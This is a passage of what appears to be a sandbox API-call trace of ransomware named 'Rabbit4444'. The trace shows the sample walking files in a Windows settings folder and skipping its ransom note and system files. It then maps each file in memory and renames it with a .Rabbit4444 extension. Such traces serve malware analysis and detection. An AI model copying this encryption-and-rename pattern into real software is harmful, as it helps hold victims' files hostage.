(lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{f56fbb39-e6d9-4b6d-9c29-ae82cff2925f}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{f56fbb39-e6d9-4b6d-9c29-ae82cff2925f}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.734] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.734] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15104437000) returned 1 [0059.734] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=947) returned 1 [0059.734] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0059.734] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0059.734] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6c0, lpName=0x0) returned 0x298 [0059.735] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6c0) returned 0x70000 [0059.736] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.736] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0059.736] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.736] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0059.736] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.736] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0059.736] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.736] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0059.736] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15104720570) returned 1 [0059.737] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0059.737] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0059.737] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.737] CloseHandle (hObject=0x298) returned 1 [0059.737] CloseHandle (hObject=0x278) returned 1 [0059.737] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{f56fbb39-e6d9-4b6d-9c29-ae82cff2925f}.settingcontent-ms.Rabbit4444") returned 192 [0059.737] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{f56fbb39-e6d9-4b6d-9c29-ae82cff2925f}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{f56fbb39-e6d9-4b6d-9c29-ae82cff2925f}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{f56fbb39-e6d9-4b6d-9c29-ae82cff2925f}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{f56fbb39-e6d9-4b6d-9c29-ae82cff2925f}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.738] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5797c6f3, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x5797c6f3, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2227720e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x426, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{f6b6e965-e9b2-444b-9286-10c9152edbc5}.settingcontent-ms", cAlternateFileName="CL173B~1.SET")) returned 1 [0059.748] lstrcmpiW (lpString1="Classic_{f6b6e965-e9b2-444b-9286-10c9152edbc5}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.748] lstrcmpiW (lpString1="Classic_{f6b6e965-e9b2-444b-9286-10c9152edbc5}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.748] lstrcmpiW (lpString1="Classic_{f6b6e965-e9b2-444b-9286-10c9152edbc5}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.748] lstrcmpiW (lpString1="Classic_{f6b6e965-e9b2-444b-9286-10c9152edbc5}.settingcontent-ms", lpString2=".") returned 1 [0059.748] lstrcmpiW (lpString1="Classic_{f6b6e965-e9b2-444b-9286-10c9152edbc5}.settingcontent-ms", lpString2="..") returned 1 [0059.748] lstrcmpiW (lpString1="Classic_{f6b6e965-e9b2-444b-9286-10c9152edbc5}.settingcontent-ms", lpString2="windows") returned -1 [0059.748] lstrcmpiW (lpString1="Classic_{f6b6e965-e9b2-444b-9286-10c9152edbc5}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.748] lstrcmpiW (lpString1="Classic_{f6b6e965-e9b2-444b-9286-10c9152edbc5}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.748] lstrcmpiW (lpString1="Classic_{f6b6e965-e9b2-444b-9286-10c9152edbc5}.settingcontent-ms", lpString2="boot") returned 1 [0059.748] lstrcmpiW (lpString1="Classic_{f6b6e965-e9b2-444b-9286-10c9152edbc5}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.748] lstrcmpiW (lpString1="Classic_{f6b6e965-e9b2-444b-9286-10c9152edbc5}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.748] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{f6b6e965-e9b2-444b-9286-10c9152edbc5}.settingcontent-ms" | out: lpString1="Classic_{f6b6e965-e9b2-444b-9286-10c9152edbc5}.settingcontent-ms") returned="Classic_{f6b6e965-e9b2-444b-9286-10c9152edbc5}.settingcontent-ms" [0059.748] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{f6b6e965-e9b2-444b-9286-10c9152edbc5}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.749] lstrlenW (lpString="Classic_{f6b6e965-e9b2-444b-9286-10c9152edbc5}.settingcontent-ms") returned 64 [0059.749] lstrlenW (lpString="Rabbit4444") returned 10 [0059.749] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.749] lstrlenW (lpString=".dll") returned 4 [0059.749] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.749] lstrlenW (lpString=".lnk") returned 4 [0059.749] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.749] lstrlenW (lpString=".ini") returned 4 [0059.749] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.749] lstrlenW (lpString=".sys") returned 4 [0059.749] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.749] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{f6b6e965-e9b2-444b-9286-10c9152edbc5}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{f6b6e965-e9b2-444b-9286-10c9152edbc5}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.750] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.750] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15106038513) returned 1 [0059.750] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1062) returned 1 [0059.750] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0059.750] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0059.750] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x730, lpName=0x0) returned 0x298 [0059.751] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x730) returned 0x70000 [0059.752] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.752] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0059.752] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.752] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0059.752] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.753] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0059.753] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.753] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0059.753] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15106346512) returned 1 [0059.753] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0059.753] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0059.753] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.753] CloseHandle (hObject=0x298) returned 1 [0059.753] CloseHandle (hObject=0x278) returned 1 [0059.753] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{f6b6e965-e9b2-444b-9286-10c9152edbc5}.settingcontent-ms.Rabbit4444") returned 192 [0059.753] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{f6b6e965-e9b2-444b-9286-10c9152edbc5}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{f6b6e965-e9b2-444b-9286-10c9152edbc5}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{f6b6e965-e9b2-444b-9286-10c9152edbc5}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{f6b6e965-e9b2-444b-9286-10c9152edbc5}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.754] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57a1504c, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x57a1504c, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x231f666f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x36e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{f82df8f7-8b9f-442e-a48c-818ea735ff9b}.settingcontent-ms", cAlternateFileName="CL5165~2.SET")) returned 1 [0059.754] lstrcmpiW (lpString1="Classic_{f82df8f7-8b9f-442e-a48c-818ea735ff9b}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.754] lstrcmpiW (lpString1="Classic_{f82df8f7-8b9f-442e-a48c-818ea735ff9b}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.754] lstrcmpiW (lpString1="Classic_{f82df8f7-8b9f-442e-a48c-818ea735ff9b}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.754] lstrcmpiW (lpString1="Classic_{f82df8f7-8b9f-442e-a48c-818ea735ff9b}.settingcontent-ms", lpString2=".") returned 1 [0059.754] lstrcmpiW (lpString1="Classic_{f82df8f7-8b9f-442e-a48c-818ea735ff9b}.settingcontent-ms", lpString2="..") returned 1 [0059.754] lstrcmpiW (lpString1="Classic_{f82df8f7-8b9f-442e-a48c-818ea735ff9b}.settingcontent-ms", lpString2="windows") returned -1 [0059.754] lstrcmpiW (lpString1="Classic_{f82df8f7-8b9f-442e-a48c-818ea735ff9b}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.754] lstrcmpiW (lpString1="Classic_{f82df8f7-8b9f-442e-a48c-818ea735ff9b}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.754] lstrcmpiW (lpString1="Classic_{f82df8f7-8b9f-442e-a48c-818ea735ff9b}.settingcontent-ms", lpString2="boot") returned 1 [0059.754] lstrcmpiW (lpString1="Classic_{f82df8f7-8b9f-442e-a48c-818ea735ff9b}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.755] lstrcmpiW (lpString1="Classic_{f82df8f7-8b9f-442e-a48c-818ea735ff9b}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.755] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{f82df8f7-8b9f-442e-a48c-818ea735ff9b}.settingcontent-ms" | out: lpString1="Classic_{f82df8f7-8b9f-442e-a48c-818ea735ff9b}.settingcontent-ms") returned="Classic_{f82df8f7-8b9f-442e-a48c-818ea735ff9b}.settingcontent-ms" [0059.755] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{f82df8f7-8b9f-442e-a48c-818ea735ff9b}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.755] lstrlenW (lpString="Classic_{f82df8f7-8b9f-442e-a48c-818ea735ff9b}.settingcontent-ms") returned 64 [0059.755] lstrlenW (lpString="Rabbit4444") returned 10 [0059.755] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.755] lstrlenW (lpString=".dll") returned 4 [0059.755] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.755] lstrlenW (lpString=".lnk") returned 4 [0059.755] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.755] lstrlenW (lpString=".ini") returned 4 [0059.755] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.755] lstrlenW (lpString=".sys") returned 4 [0059.755] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.755] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{f82df8f7-8b9f-442e-a48c-818ea735ff9b}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{f82df8f7-8b9f-442e-a48c-818ea735ff9b}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.755] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.755] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15106619057) returned 1 [0059.755] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=878) returned 1 [0059.756] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0059.756] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0059.756] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x670, lpName=0x0) returned 0x298 [0059.757] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x670) returned 0x70000 [0059.758] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.758] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0059.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.758] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0059.758] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0059.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0059.758] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15106892433) returned 1 [0059.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0059.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0059.758] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.758] CloseHandle (hObject=0x298) returned 1 [0059.758] CloseHandle (hObject=0x278) returned 1 [0059.758] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{f82df8f7-8b9f-442e-a48c-818ea735ff9b}.settingcontent-ms.Rabbit4444") returned 192 [0059.759] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{f82df8f7-8b9f-442e-a48c-818ea735ff9b}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{f82df8f7-8b9f-442e-a48c-818ea735ff9b}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{f82df8f7-8b9f-442e-a48c-818ea735ff9b}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{f82df8f7-8b9f-442e-a48c-818ea735ff9b}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.759] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57aad9b4, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x57aad9b4, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x224b3550, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{F96E2F30-2018-4F0E-BBEE-7CCBEE8CE714}.settingcontent-ms", cAlternateFileName="CL84F5~1.SET")) returned 1 [0059.759] lstrcmpiW (lpString1="Classic_{F96E2F30-2018-4F0E-BBEE-7CCBEE8CE714}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.759] lstrcmpiW (lpString1="Classic_{F96E2F30-2018-4F0E-BBEE-7CCBEE8CE714}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.759] lstrcmpiW (lpString1="Classic_{F96E2F30-2018-4F0E-BBEE-7CCBEE8CE714}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.759] lstrcmpiW (lpString1="Classic_{F96E2F30-2018-4F0E-BBEE-7CCBEE8CE714}.settingcontent-ms", lpString2=".") returned 1 [0059.760] lstrcmpiW (lpString1="Classic_{F96E2F30-2018-4F0E-BBEE-7CCBEE8CE714}.settingcontent-ms", lpString2="..") returned 1 [0059.760] lstrcmpiW (lpString1="Classic_{F96E2F30-2018-4F0E-BBEE-7CCBEE8CE714}.settingcontent-ms", lpString2="windows") returned -1 [0059.760] lstrcmpiW (lpString1="Classic_{F96E2F30-2018-4F0E-BBEE-7CCBEE8CE714}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.760] lstrcmpiW (lpString1="Classic_{F96E2F30-2018-4F0E-BBEE-7CCBEE8CE714}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.760] lstrcmpiW (lpString1="Classic_{F96E2F30-2018-4F0E-BBEE-7CCBEE8CE714}.settingcontent-ms", lpString2="boot") returned 1 [0059.760] lstrcmpiW (lpString1="Classic_{F96E2F30-2018-4F0E-BBEE-7CCBEE8CE714}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.760] lstrcmpiW (lpString1="Classic_{F96E2F30-2018-4F0E-BBEE-7CCBEE8CE714}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.760] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{F96E2F30-2018-4F0E-BBEE-7CCBEE8CE714}.settingcontent-ms" | out: lpString1="Classic_{F96E2F30-2018-4F0E-BBEE-7CCBEE8CE714}.settingcontent-ms") returned="Classic_{F96E2F30-2018-4F0E-BBEE-7CCBEE8CE714}.settingcontent-ms" [0059.760] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{F96E2F30-2018-4F0E-BBEE-7CCBEE8CE714}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.760] lstrlenW (lpString="Classic_{F96E2F30-2018-4F0E-BBEE-7CCBEE8CE714}.settingcontent-ms") returned 64 [0059.760] lstrlenW (lpString="Rabbit4444") returned 10 [0059.760] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.760] lstrlenW (lpString=".dll") returned 4 [0059.760] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.760] lstrlenW (lpString=".lnk") returned 4 [0059.760] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.760] lstrlenW (lpString=".ini") returned 4 [0059.760] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.760] lstrlenW (lpString=".sys") returned 4 [0059.760] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.760] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{F96E2F30-2018-4F0E-BBEE-7CCBEE8CE714}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{f96e2f30-2018-4f0e-bbee-7ccbee8ce714}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.761] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.761] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15107132734) returned 1 [0059.761] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1208) returned 1 [0059.761] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0059.761] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0059.761] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7c0, lpName=0x0) returned 0x298 [0059.762] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7c0) returned 0x70000 [0059.763] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.763] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0059.763] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.763] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0059.763] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.763] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0059.763] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.763] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0059.763] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15107394848) returned 1 [0059.763] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0059.763] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0059.763] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.763] CloseHandle (hObject=0x298) returned 1 [0059.763] CloseHandle (hObject=0x278) returned 1 [0059.764] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{F96E2F30-2018-4F0E-BBEE-7CCBEE8CE714}.settingcontent-ms.Rabbit4444") returned 192 [0059.764] MoveFileExW 